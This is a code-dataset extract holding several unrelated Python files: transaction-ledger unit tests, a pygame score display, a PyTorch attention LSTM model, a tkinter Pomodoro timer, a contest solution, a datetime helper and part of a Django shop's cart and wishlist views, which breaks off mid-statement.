test_create_tz()\r\n test_valid_tz()\r\n test_sum_gr8_than()\r\n test_b4_day_gr8_than()\r\n test_tz_anumit_tip()\r\n test_sv_el_tz_tip()\r\n test_add_tz()\r\n test_sv_sum_tip()\r\n test_sv_sold()\r\n test_sv_tz_tip_ord()\r\n test_sv_del_tz_zi()\r\n test_sv_del_tz_per()\r\n test_sv_del_tz_tip()\r\n test_sv_el_tz_small_and_type()\r\n test_undo()\r\ndef test_create_tz():\r\n tz=create_tz(1,100.50,'intrare')\r\n assert(get_zi(tz)==1)\r\n assert(get_suma(tz)==100.50)\r\n assert(get_tip(tz)=='intrare')\r\n \r\ndef test_add_tz():\r\n s=create_state()\r\n s2=create_state()\r\n zi=1\r\n suma=100\r\n tip='intrare'\r\n tz=create_tz(zi,suma,tip)\r\n add_tz(s, tz)\r\n add_tz(s2,tz)\r\n assert(s==s2)\r\n \r\ndef test_valid_tz():\r\n tz=create_tz(1,100.50,'intrare')\r\n valid_tz(tz)\r\n \r\n tz1=create_tz(-3,100.50,'intrare')\r\n try:\r\n valid_tz(tz1)\r\n assert(False)\r\n except Exception as ex:\r\n assert(str(ex)==\"zi incorecta!\")\r\n \r\n tz2=create_tz(3,-34.6,'intrare')\r\n try:\r\n valid_tz(tz2)\r\n assert(False)\r\n except Exception as ex:\r\n assert(str(ex)==\"suma incorecta!\")\r\n \r\n tz3=create_tz(3,100.50,'random')\r\n try:\r\n valid_tz(tz3)\r\n assert(False)\r\n except Exception as ex:\r\n assert(str(ex)==\"tip incorect!\")\r\ndef test_sum_gr8_than():\r\n tz1=create_tz(1, 10, 'intrare')\r\n tz2=create_tz(2, 50, 'iesire')\r\n assert(sum_gr8_than(30,tz1)==False)\r\n assert(sum_gr8_than(30,tz2)==True)\r\ndef test_b4_day_gr8_than():\r\n tz1=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(30,15,tz1)==True)\r\n tz2=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(30,5,tz2)==False)\r\n tz3=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(100,15,tz3)==False)\r\n 
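# From these cases, b4_day_gr8_than(S, Z, tz) appears to hold only when the\r\n    # transaction day is before Z and its amount exceeds S (inferred; the actual\r\n    # implementation lives in the Cautari module).\r\n    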
tz4=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(100,5,tz4)==False)\r\ndef test_tz_anumit_tip():\r\n tz1=create_tz(10,50,'intrare')\r\n assert(tz_anumit_tip(tz1,'intrare')==True)\r\n tz2=create_tz(10,50,'iesire')\r\n assert(tz_anumit_tip(tz2,'iesire')==True)\r\n tz3=create_tz(10,50,'intrare')\r\n assert(tz_anumit_tip(tz3,'iesire')==False)\r\n tz4=create_tz(10,50,'iesire')\r\n assert(tz_anumit_tip(tz4,'intrare')==False)\r\n \r\ndef test_sv_el_tz_tip():\r\n s=create_state()\r\n s2=create_state()\r\n tz1=create_tz(10,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(15,150,'iesire')\r\n add_tz(s,tz2)\r\n tz3=create_tz(50,200,'intrare')\r\n add_tz(s,tz3)\r\n \r\n add_tz(s2,tz1)\r\n add_tz(s2,tz3)\r\n T='iesire'\r\n assert (sv_el_tz_tip(T,s)==s2)\r\n \r\n s2=create_state()\r\n add_tz(s2,tz2)\r\n T='intrare'\r\n assert(sv_el_tz_tip(T, s)==s2)\r\ndef test_sv_el_tz_small_and_type():\r\n s=create_state()\r\n s2=create_state()\r\n tz1=create_tz(10,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(15,150,'iesire')\r\n add_tz(s,tz2)\r\n tz3=create_tz(50,200,'intrare')\r\n add_tz(s,tz3)\r\n T='intrare'\r\n S=120\r\n add_tz(s2,tz2)\r\n add_tz(s2,tz3)\r\n assert(sv_el_tz_small_and_type(S,T,s)==s2)\r\ndef test_sv_sum_tip():\r\n s=create_state()\r\n T='intrare'\r\n assert(sv_sum_tip(T,s)=='Lista este goala!')\r\n tz1=create_tz(10,100,'intrare')\r\n add_tz(s,tz1)\r\n T='iesire'\r\n assert(sv_sum_tip(T,s)==0)\r\n tz2=create_tz(15,150,'iesire')\r\n add_tz(s,tz2)\r\n tz3=create_tz(50,200,'intrare')\r\n add_tz(s,tz3)\r\n T='intrare'\r\n assert(sv_sum_tip(T,s)==300)\r\n T='iesire'\r\n assert(sv_sum_tip(T,s)==150)\r\ndef test_sv_sold():\r\n s=create_state()\r\n Z=5\r\n assert(sv_sold(Z,s)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(3,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(4,20,'iesire')\r\n add_tz(s,tz4)\r\n assert(sv_sold(Z,s)==230)\r\n Z=2\r\n assert(sv_sold(Z,s)==50)\r\ndef test_sv_tz_tip_ord():\r\n s=create_state()\r\n T='intrare'\r\n assert(sv_tz_tip_ord(T,s)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(3,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(4,20,'iesire')\r\n add_tz(s,tz4)\r\n s2=create_state()\r\n add_tz(s2,tz1)\r\n add_tz(s2,tz2)\r\n assert(sv_tz_tip_ord(T,s)==s2)\r\n \r\ndef test_sv_del_tz_zi():\r\n s=create_state()\r\n Z=2\r\n assert(sv_del_tz_zi(s,Z)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(1,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(2,20,'iesire')\r\n add_tz(s,tz4)\r\n s2=create_state()\r\n add_tz(s2,tz1)\r\n add_tz(s2,tz2)\r\n assert(sv_del_tz_zi(s,Z)==s2)\r\ndef test_sv_del_tz_per():\r\n s=create_state()\r\n Z1=2\r\n Z2=5\r\n assert(sv_del_tz_per(s,Z1,Z2)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(1,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(3,20,'iesire')\r\n add_tz(s,tz4)\r\n Z1=1\r\n Z2=2\r\n s2=create_state()\r\n add_tz(s2,tz4)\r\n assert(sv_del_tz_per(s,Z1,Z2)==s2)\r\n Z1=2\r\n Z2=1\r\n assert(sv_del_tz_per(s,Z1,Z2)==s2)\r\ndef test_sv_del_tz_tip():\r\n s=create_state()\r\n T='intrare'\r\n assert(sv_del_tz_tip(s,T)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(1,200,'intrare')\r\n add_tz(s,tz2)\r\n 
tz3=create_tz(2,50,'iesire')\r\n    add_tz(s,tz3)\r\n    tz4=create_tz(3,20,'iesire')\r\n    add_tz(s,tz4)\r\n    s2=create_state()\r\n    add_tz(s2,tz3)\r\n    add_tz(s2,tz4)\r\n    assert(sv_del_tz_tip(s,T)==s2)\r\n    s3=create_state()\r\n    T='iesire'\r\n    assert(sv_del_tz_tip(s,T)==s3)\r\ndef test_undo():\r\n    s=create_state()\r\n    us=create_state()\r\n    tz1=create_tz(1,100,'intrare')\r\n    add_tz(s,tz1)\r\n    us.append(tz1)\r\n    tz2=create_tz(2,200,'iesire')\r\n    add_tz(s,tz2)\r\n    us2=create_state()\r\n    us2.append(tz1)\r\n    us2.append(tz1)\r\n    us.append(us2.copy())\r\n    s2=create_state()\r\n    add_tz(s2,tz1)\r\n    del s[:]\r\n    s+=sv_undo(s,us).copy()\r\n    assert(us==s2)","repo_name":"Tonirel/Test_Repository","sub_path":"TemaLab4_6Istvan/Cod/Tests.py","file_name":"Tests.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"18915957914","text":"import pygame.ftfont\nfrom pygame.sprite import Group\nfrom plane import Plane\nclass Score():\n    def __init__(self,ai_settings,screen,stats):\n        self.screen =screen\n        self.ai_settings =ai_settings\n        self.screen_rect =screen.get_rect()\n        self.stats = stats\n        self.text_color=(30,30,30)\n        # Font settings\n        self.font = pygame.font.SysFont(None,28)\n        self.init_score()\n        self.init_level()\n        self.init_left_life()\n    def init_left_life(self):\n        self.planes = Group()\n        for life in range(self.stats.hero_left):\n            plane = Plane(self.ai_settings,self.screen)\n            plane.rect.x =10 +life*40\n            plane.rect.y=10\n            _image = pygame.image.load(\"images\\\\hero_plane_1.png\")\n            heart =pygame.transform.scale(_image,(40,40))\n            plane.set_image(heart)\n            self.planes.add(plane)\n    def init_level(self):\n        level_str = str(self.stats.level)\n        # The second boolean argument toggles anti-aliasing\n        self.level_image = self.font.render(level_str, True, self.text_color)\n        self.level_rect = self.level_image.get_rect()\n        self.level_rect.right = self.screen_rect.right - 20\n        self.level_rect.top = 43\n    def init_score(self):\n        score_str = str(self.stats.score)\n        # The second boolean argument toggles anti-aliasing\n        self.score_image = self.font.render(score_str,True,self.text_color)\n        self.score_rect =self.score_image.get_rect()\n        self.score_rect.right = self.screen_rect.right-20\n        self.score_rect.top =20\n    def show_score(self):\n        self.screen.blit(self.score_image,self.score_rect)\n        self.screen.blit(self.level_image, self.level_rect)\n        self.planes.draw(self.screen)\n    def reset_score(self):\n        self.stats.score=0\n    def reset_level(self):\n        self.stats.level=1\n\n","repo_name":"Mrxulovemingming/learngit","sub_path":"plane_game/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"18024978740","text":"\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport os\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n\nclass self_attention_net(nn.Module):\n    def __init__(self, label_hidden_size, max_sen, atten_size):\n        super(self_attention_net, self).__init__()\n        self.hidden_size = label_hidden_size\n        self.sen_len = max_sen\n        self.attention_size = atten_size\n        self.w_omega = Variable(torch.zeros(self.hidden_size * 2, self.attention_size).cuda())\n        self.u_omega = Variable(torch.zeros(self.attention_size).cuda())\n\n    def forward(self, lstm_output):\n        # print(lstm_output.size()) = (batch_size,squence_length, hidden_size*layer_size)\n        output_reshape = 
torch.Tensor.reshape(lstm_output, [-1, self.hidden_size * 2]).cuda()\n        attn_tanh = torch.tanh(torch.mm(output_reshape, self.w_omega)).cuda()\n        attn_hidden_layer = torch.mm(attn_tanh, torch.Tensor.reshape(self.u_omega, [-1, 1])).cuda()\n        exps = torch.Tensor.reshape(torch.exp(attn_hidden_layer), [-1, self.sen_len]).cuda()\n        alphas = exps / torch.Tensor.reshape(torch.sum(exps, 1), [-1, 1]).cuda()\n        alphas_reshape = torch.Tensor.reshape(alphas, [-1, self.sen_len, 1]).cuda()\n        attn_output = torch.sum(lstm_output * alphas_reshape, 1).cuda()\n        # lstm_output = torch.sum(lstm_output,1)\n        # out = torch.cat((attn_output,lstm_output),dim=1)\n        #attn_output.size() num_class*hiddensize*2 (bidirectional LSTM)\n        return attn_output\n\n\n\nclass sen_attention_label(nn.Module):\n    def __init__(self, num_class):\n        super(sen_attention_label, self).__init__()\n        self.class_num = num_class\n\n    def forward(self, x, label):\n        # x.size():(batch_size, hidden_size)  query\n        # label:(num_class, label_hidden_size*2)  Xi\n        ### similarity computed as a dot product\n        label = label.transpose(0, 1).cuda()\n        # print('label.size():',label.size())\n        m = torch.tanh(torch.mm(x, label)).cuda()\n        exps = torch.exp(m).cuda()\n        a = exps / torch.Tensor.reshape(torch.sum(exps, 1), [-1, 1]).cuda()  ### compute the attention weights\n        a_reshape = torch.Tensor.reshape(a, [self.class_num, -1]).cuda()\n        self.a = a.detach()\n        self.a_reshape = a_reshape.detach()\n        # print('a_reshape',a_reshape.size())\n        # label_attn_output = label_attn_output.transpose(0, 1)\n        # print('label_attn_output.size():', label_attn_output.size())\n        finalx = torch.mm(label, a_reshape).cuda()\n        self.finalx = finalx.detach()\n        finalx = finalx.transpose(0, 1).cuda()\n\n        # finalx = torch.mm(x, finalx)\n        # print('finalx',finalx.size())\n\n        # lstm_output = torch.sum(lstm_output, 1)\n        # out = torch.cat((sen_attn_output, finalx), dim = 1)  # concatenate horizontally (batch_size, hidden_size*layer_size*2)\n        # out = torch.cat((x, finalx), dim=1).cuda()\n        # out = (x + finalx).cuda()\n        # print('out', out.size())\n        # lstm_output = torch.sum(lstm_output, 1)\n        # output = torch.cat((lstm_output, out), dim = 1)\n        return finalx\n\n\n\nclass label_layer(nn.Module):\n    def __init__(self, num_class, embed_dim, label_hidden_size, max_sen, atten_size):\n        super(label_layer, self).__init__()\n        self.class_num = num_class\n        self.embed_dim = embed_dim\n        self.hidden_size = label_hidden_size\n        self.attention_net = self_attention_net(label_hidden_size,max_sen,atten_size)\n        self.lstm = nn.LSTM(embed_dim, label_hidden_size, 1, batch_first=True,\n                            dropout=0.5,\n                            bidirectional=True)\n        self.sen_attention_label = sen_attention_label(num_class=num_class)\n\n    def forward(self, x, label):\n        s, b, f = label.size()\n        h_0 = Variable(torch.zeros(2, s, self.hidden_size).cuda())\n        c_0 = Variable(torch.zeros(2, s, self.hidden_size).cuda())\n        label, (final_hidden_state, final_cell_state) = self.lstm(label, (h_0, c_0))\n        label = self.attention_net(label)\n        out = self.sen_attention_label(x, label)\n        return out\n\n\n#### main model\nclass multi_atten_lstm(torch.nn.Module):\n    def __init__(self, output_size, hidden_size, embed_dim, sequence_length, num_class,\n                 atten_size, label_embed, label_max_sen, dropout):\n        super(multi_atten_lstm, self).__init__()\n\n        self.label_embed = label_embed\n\n        self.output_size = output_size\n        self.hidden_size = hidden_size\n        # the feature dimension\n        self.embed_dim = embed_dim\n        self.dropout = dropout\n        self.num_class = num_class\n        # the number of time steps\n        self.sequence_length = sequence_length\n        self.bidirectional = True\n        # a 1-layer LSTM\n        self.layer_size = 1\n        self.lstm = nn.LSTM(self.embed_dim,self.hidden_size,self.layer_size, 
dropout=self.dropout,\n                            batch_first=True,\n                            bidirectional= self.bidirectional\n                            )#(squence_length, batch_size, hidden_size*layer_size)\n        if self.bidirectional:\n            self.layer_size = self.layer_size * 2\n        else:\n            self.layer_size = self.layer_size\n        # self.layer_size = self.layer_size\n        self.attention_size = atten_size\n\n        self.label_layer = label_layer(num_class=self.num_class, embed_dim=embed_dim, label_hidden_size=hidden_size,\n                                       max_sen=label_max_sen, atten_size=atten_size)\n\n        self.last = nn.Linear(hidden_size * self.layer_size, output_size)\n\n    def init_hidden(self, batch_size):\n        return (torch.zeros(self.layer_size,batch_size,self.hidden_size,dtype=torch.float32).cuda(),\n                torch.zeros(self.layer_size,batch_size,self.hidden_size,dtype=torch.float32).cuda())\n\n\n\n    def forward(self, input):\n        batch_size = input.size(0)\n        input_hidden = self.init_hidden(batch_size)\n\n        lstm_output, _ = self.lstm(input, input_hidden)\n        lstm_output = torch.sum(lstm_output, 1)\n        label = self.label_layer(lstm_output,self.label_embed)\n\n        # ### form the sentence vector\n        # lstm_output = torch.sum(lstm_output, 1)\n        # label_lstm_out = torch.sum(label_lstm_out, 1)\n\n        out = (lstm_output+label).cuda()\n\n        logits = self.last(out)\n        return logits","repo_name":"ceceliax/LIE","sub_path":"LIE2/model/multi_atten.py","file_name":"multi_atten.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"41726711307","text":"import time\nimport math\nimport threading\nimport tkinter as tk\nfrom tkinter import ttk, PhotoImage\n\nPOMODORO_MINUTES = 25\nSHORT_REST_MINUTES = 5\nLONG_REST_MINUTES = 15\n\nSMALL_FONT = (\"Ubuntu\", 12)\nTOMATO_TEXT = ''\n\nclass PomodoroTimer:\n    def __init__(self):\n        self.root = tk.Tk()\n        # self.root.geometry(\"350x150\")\n        self.root.title(\"Pomodoro Timer [insert some tomato here]\")\n        # tomato = PhotoImage(file=\"tomato.png\")\n        # self.root.tk.call('wm','iconphoto', self.root._w, tomato)\n\n        self.s = ttk.Style()\n        self.s.configure(\"TNotebook.Tab\", font=SMALL_FONT)\n        self.s.configure(\"TButton\", font=SMALL_FONT)\n\n        self.tabs = ttk.Notebook(self.root)\n        self.tabs.pack(fill=\"both\", pady=10, expand=True)\n\n        self.tab1 = ttk.Frame(self.tabs)\n        self.tab2 = ttk.Frame(self.tabs)\n        self.tab3 = ttk.Frame(self.tabs)\n\n        self.pomodoro_timer_label = ttk.Label(self.tab1, text=f\"{POMODORO_MINUTES:02d}:00\", font=(\"Ubuntu\",48))\n        self.pomodoro_timer_label.pack()\n\n        self.short_rest_timer_label = ttk.Label(self.tab2, text=f\"{SHORT_REST_MINUTES:02d}:00\", font=(\"Ubuntu\",48))\n        self.short_rest_timer_label.pack()\n\n        self.long_rest_timer_label = ttk.Label(self.tab3, text=f\"{LONG_REST_MINUTES:02d}:00\", font=(\"Ubuntu\",48))\n        self.long_rest_timer_label.pack()\n\n        self.tabs.add(self.tab1, text=\"Pomodoro\")\n        self.tabs.add(self.tab2, text=\"Short Rest\")\n        self.tabs.add(self.tab3, text=\"Long Rest\")\n\n\n        self.grid_layout = ttk.Frame(self.root)\n        self.grid_layout.pack(pady=(0,10),padx=10)\n\n        self.pomodoro_counter_label = ttk.Label(self.grid_layout, text=\"Pomodoros: 0\", font=SMALL_FONT)\n        self.pomodoro_counter_label.grid(row=0, column=0, columnspan=4, pady=(0,10))\n\n        self.start_button = ttk.Button(self.grid_layout, text=\"Start\", command=self.start_timer_thread)\n        self.start_button.grid(row=1, column=0)\n\n        self.pause_button = ttk.Button(self.grid_layout, text=\"Pause\", command=self.pause_timer)\n        self.pause_button.grid(row=1, column=1)\n\n        self.skip_button = ttk.Button(self.grid_layout, text=\"Skip\", 
command=self.skip_timer)\n self.skip_button.grid(row=1, column=2)\n\n self.reset_button = ttk.Button(self.grid_layout, text=\"Reset\", command=self.reset_timer)\n self.reset_button.grid(row=1, column=3)\n\n\n\n self.pomodoro_counter = 0\n self.skipped = False\n self.stopped = False\n self.running = False\n self.paused = False\n\n self.root.mainloop()\n\n def start_timer_thread(self):\n if not self.running:\n t = threading.Thread(target=self.start_timer)\n t.start()\n self.running = True\n self.paused = False\n\n def start_timer(self):\n self.stopped = False\n self.skipped = False\n self.paused = False\n timer_id = self.tabs.index(self.tabs.select())\n\n\n self.time_counter(timer_id)\n\n \n if not self.stopped or self.skipped:\n if timer_id == 0:\n self.pomodoro_counter += 1\n self.pomodoro_counter_label.configure(text=f\"Pomodoros: {self.pomodoro_counter}\")\n if self.pomodoro_counter % 4 == 0:\n self.tabs.select(2)\n else:\n self.tabs.select(1)\n elif timer_id == 1 or timer_id == 2:\n self.tabs.select(0)\n self.start_timer()\n\n def time_counter(self, timer_id):\n if timer_id == 0:\n full_seconds = 60 * POMODORO_MINUTES\n elif timer_id == 1:\n full_seconds = 60 * SHORT_REST_MINUTES\n elif timer_id == 2:\n full_seconds = 60 * LONG_REST_MINUTES\n while full_seconds > 0 and not self.stopped:\n\n if not self.paused:\n minutes, seconds = divmod(full_seconds,60)\n minutes = int(minutes)\n seconds = math.floor(seconds)\n\n time.sleep(0.1)\n full_seconds -= 0.1\n\n if timer_id == 0:\n self.pomodoro_timer_label.configure(text=f\"{minutes:02d}:{seconds:02d}\")\n elif timer_id == 1:\n self.short_rest_timer_label.configure(text=f\"{minutes:02d}:{seconds:02d}\")\n elif timer_id == 2:\n self.long_rest_timer_label.configure(text=f\"{minutes:02d}:{seconds:02d}\")\n self.root.update()\n \n self.reset_labels()\n\n def pause_timer(self):\n self.paused = not self.paused\n\n\n def reset_timer(self):\n self.stopped = True\n self.skipped = False\n self.running = False\n self.paused = False\n\n self.pomodoro_counter = 0\n self.pomodoro_counter_label.configure(text=\"Pomodoros: 0\")\n \n \n self.reset_labels()\n\n\n def skip_timer(self):\n \n self.skipped = True\n self.stopped = True\n self.paused = False\n \n def reset_labels(self):\n self.pomodoro_timer_label.configure(text=f\"{POMODORO_MINUTES:02d}:00\")\n self.short_rest_timer_label.configure(text=f\"{SHORT_REST_MINUTES:02d}:00\") \n self.long_rest_timer_label.configure(text=f\"{LONG_REST_MINUTES:02d}:00\")\n \nif __name__ == '__main__':\n PomodoroTimer()","repo_name":"alceuramos/pomodoro-timer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23577055411","text":"#!/opt/local/bin/python\n\n\"\"\"Premature optimization is the root of all evil.\"\"\"\n\nimport sys\nimport re\n\nfrom math import ceil, floor\n\ndef isaset(nums, R):\n minx = ceil(10*nums[0]/(11*R[0]))\n manx = floor(10*nums[0]/(9*R[0]))\n for i in range(1, len(R)):\n r = [ceil(10*nums[i]/(11*R[i])), floor(10*nums[i]/(9*R[i]))]\n minx = min(minx, r[0])\n manx = max(manx, r[1])\n return minx <= manx\n\n\ndef doit(N, P, R, amts):\n \"\"\"Well, lets get the small case at least...\"\"\"\n\n srs = [0 for _ in R]\n for i in range(len(R)):\n srs[i] = [(ceil(10*a/(11*R[i])), floor(10*a/(9*R[i]))) for a in amts[i]]\n\n sets = 0\n usd = [0 for _ in R]\n while usd[0] < len(srs[0]):\n good = True\n r = srs[0][usd[0]]\n if r[1] < r[0]:\n usd[0] += 1\n continue\n t = 
usd[:]\n        for I in range(1,len(R)):\n            t[I] = usd[I]\n            while srs[I][t[I]][1] < r[0]:\n                t[I] += 1\n                if t[I] >= len(srs[I]):\n                    good = False\n                    break\n            if good and srs[I][t[I]][0] > r[1]:\n                good = False\n                usd[I] = t[I]\n            if not good:\n                break\n        if good:\n            usd[1:] = [x + 1 for x in t[1:]]\n            sets += 1\n        usd[0] += 1\n\n    return sets\n\n    \n\nT = int(sys.stdin.readline())\nfor casenum in range(T):\n    data = [int(x) for x in sys.stdin.readline().split()]\n    rec = [int(z) for z in sys.stdin.readline().split()]\n    amts = []\n    for i in range(data[0]):\n        amts.append(sorted([int(y) for y in sys.stdin.readline().split()]))\n    n = doit(data[0], data[1], rec, amts)\n\n\n\n\n    print(\"Case #\" + str(casenum + 1) + \": \" + str(n))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_204/186.py","file_name":"186.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"4239446975","text":"from datetime import datetime\nfrom typing import Union\n\n__all__ = [\"DateTime\"]\n\n\nclass DateTime(datetime):\n    @classmethod\n    def _validate_timestamp(cls, value) -> Union[int, float]:\n        assert isinstance(value, (int, float)), f\"{value} is not valid.\"\n        return value\n\n    @classmethod\n    def _validate_date(cls, other):\n        assert isinstance(other, datetime), f\"Send {datetime} obj\"\n        return other\n\n    @classmethod\n    def days_from_timestamp(cls, timestamp):\n        return timestamp / (3600 * 24)\n\n    @classmethod\n    def into_timestamp(cls, days=0, min_=0, sec=0):\n        days = 3600 * 24 * days if cls._validate_timestamp(days) else days  # days to seconds\n        min_ = 60 * min_ if cls._validate_timestamp(min_) else min_  # minutes to seconds\n        return days + min_ + cls._validate_timestamp(sec)\n\n    def add(self, days=0, min_=0, sec=0):\n        return self.fromtimestamp(\n            self.timestamp() + self.into_timestamp(days, min_, sec)\n        )\n\n    def sub(self, days=0, min_=0, sec=0):\n        return self.fromtimestamp(\n            abs(self.timestamp() - self.into_timestamp(days, min_, sec))\n        )\n\n    def days_between(self, other):\n        return self.days_from_timestamp(\n            abs(self.timestamp() - self._validate_date(other).timestamp())\n        )\n\n    def compare(self, other):\n        \"\"\"\n        compares date time and\n        returns 1 if the instantiated date is greater,\n        -1 if the instantiated date is less than,\n        and 0 if they are equal.\n        \"\"\"\n        return (\n            1\n            if self.timestamp() > self._validate_date(other).timestamp()\n            else -1\n            if self.timestamp() < self._validate_date(other).timestamp()\n            else 0\n        )\n","repo_name":"cereja-project/cereja","sub_path":"cereja/date/_datetime.py","file_name":"_datetime.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"}
{"seq_id":"42707305078","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import generic, View\nfrom .models import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nimport decimal\nfrom django.db.models import Q, F\nfrom .forms import ShipmentDetailForm, ConfirmedOrderDetailForm\nimport random\nfrom django.contrib import messages\nfrom django.http import JsonResponse\n\n\nclass Home (generic.TemplateView):\n    \"\"\"\n    Renders the index page\n    \"\"\"\n    template_name = 'index.html'\n\n\nclass ProductSearch(generic.ListView):\n    \"\"\"\n    Renders the user's search for products by name\n    \"\"\"\n    model = Product\n    template_name = 'products.html'\n    paginate_by = 8\n\n    def get_queryset(self):\n        query 
= self.request.GET.get('search-product')\n return Product.objects.filter(available=True).filter(\n name__icontains=query).order_by('-created_on')\n\n\nclass Products (generic.ListView):\n \"\"\"\n Fetch products data from database and display on\n products.html\n \"\"\"\n queryset = Product.objects.filter(available=True).order_by('-created_on')\n template_name = 'products.html'\n paginate_by = 8\n\n\nclass ProductsCategory (generic.ListView):\n \"\"\"\n Display products based on categories\n \"\"\"\n queryset = Product.objects.filter(available=True).order_by('-created_on')\n template_name = 'products.html'\n paginate_by = 8\n\n def get_context_data(self, **kwargs):\n category_param = self.kwargs.get(\"category\")\n category = ProductCategories.objects.get(category_name=category_param)\n products = Product.objects.filter(product_category=category).filter(\n available=True).order_by('-created_on')\n return {'product_list': products}\n\n\nclass SpecialOffers (generic.ListView):\n \"\"\"\n Display products on special offers\n \"\"\"\n queryset = Product.objects.filter(available=True).filter(\n stock__gt=0).filter(~Q(discount_name=2)).order_by('-created_on')\n template_name = 'products.html'\n paginate_by = 8\n\n\nclass ProductDetail(generic.DetailView):\n \"\"\"\n Display product details\n \"\"\"\n def get(self, request, slug, *args, **kwargs):\n queryset = Product.objects.filter(\n slug=slug).order_by('-created_on')\n product = get_object_or_404(queryset)\n\n discount = 0\n if product.discount_name.discount_percentage > 0:\n discount = (float(product.discount_name.discount_percentage)\n * float(product.price)) / 100\n discount = product.price-decimal.Decimal(discount)\n\n product_wish = False\n add_to_cart = False\n if request.user.is_authenticated:\n if Wishes.objects.filter(user=request.user, wish_id=product.id):\n product_wish = True\n else:\n product_wish = False\n if request.session.get('cart') is not None:\n if str(product.id) in request.session.get('cart'):\n add_to_cart = True\n else:\n add_to_cart = False\n return render(\n request,\n \"product_detail.html\",\n {\n 'product': product,\n 'product_wish': product_wish,\n 'add_to_cart': add_to_cart,\n 'discount': discount,\n },\n )\n\n\nclass Wishlist(generic.ListView):\n \"\"\"\n Display user products in wishlist once logged in\n \"\"\"\n paginate_by = 8\n template_name = 'wishlist.html'\n context_object_name = 'wishlist'\n\n def get_queryset(self):\n return Wishes.objects.filter(user=self.request.user)\n\n\nclass AddToWishlist(View):\n \"\"\"\n Add / remove items to wishlist modal without page refresh\n \"\"\"\n def post(self, request):\n if request.method == 'POST':\n if request.user.is_authenticated:\n prod_id = int(request.POST.get('productId'))\n product_check = Product.objects.get(id=prod_id)\n if product_check:\n if Wishes.objects.filter(\n user=request.user, wish_id=prod_id):\n wish_delete = get_object_or_404(\n Wishes, user=request.user, wish_id=prod_id)\n wish_delete.delete()\n else:\n Wishes.objects.create(\n user=request.user, wish_id=prod_id)\n return redirect('/')\n\n\ndef cart(request):\n \"\"\"\n Display cart items and total based on cart products\n \"\"\"\n if request.method == 'POST':\n cart = request.session.get(settings.CART_SESSION_ID)\n request.session.cart = cart\n prod_id = str(request.POST.get('productId'))\n del request.session.cart[prod_id]\n request.session.modified = True\n return redirect('/')\n total = 0.00\n ship_total = 5.00\n if request.session.get('cart') is not None and request.session.get('cart'):\n 
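# The session cart maps product ids to per-item data; collect the ids and sum the line totals.\n        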
ids = []\n\n        for key, value in request.session.get('cart').items():\n            total += value['prod_total']\n            ids.append(str(key))\n\n        products = Product.objects.filter(available=True).filter(\n            stock__gt=0).filter(id__in=ids)\n        ship_total = round(ship_total + total, 2)\n    else:\n        products = []\n        cart = 'Nothing in cart'\n    context = {\n        'products': products,\n        'total': round(total, 2),\n        'ship_total': ship_total,\n    }\n    return render(request, 'cart.html', context)\n\n\nclass AddToCart(View):\n    \"\"\"\n    Add / remove cart items in the cart session without a page refresh;\n    items in the session are product id, quantity, price, discount, and the line total\n    \"\"\"\n    def post(self, request):\n        if request.method == 'POST':\n            prod_id = str(request.POST.get('productId'))\n            prod_quantity = int(request.POST.get('productQuantity'))\n            product_price = float(request.POST.get('price'))\n            if request.POST.get('discount') is not None:\n                prod_discount = float(request.POST.get('discount'))\n                prod_total = prod_discount * prod_quantity\n            else:\n                prod_discount = 0.0\n                prod_total = product_price * prod_quantity\n            prod_total = round(prod_total, 2)\n            self.session = request.session\n            cart = self.session.get(settings.CART_SESSION_ID)\n            if not cart:\n                cart = self.session[settings.CART_SESSION_ID] = {}\n            self.cart = cart\n            if prod_id not in self.cart:\n                self.cart[prod_id] = {\n                    'quantity': prod_quantity,\n                    'price': product_price,\n                    'discount': prod_discount,\n                    'prod_total': prod_total,\n                }\n            else:\n                del 